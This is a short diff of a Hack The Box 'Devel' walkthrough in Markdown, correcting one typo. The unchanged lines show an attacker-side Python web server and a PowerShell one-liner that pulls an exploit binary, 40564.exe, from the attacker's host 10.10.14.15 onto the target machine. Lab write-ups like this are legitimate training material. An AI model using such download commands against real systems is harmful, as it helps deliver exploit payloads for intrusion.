benoitbeaulieu-ls/htb_devel/Devel.md

 `python -m SimpleHTTPServer 8080`

-Since there is no netcat installed on the machine, let use some powershell to grba the file.
+Since there is no netcat installed on the machine, let use some powershell to grab the file.

 `powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.15:8080/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"`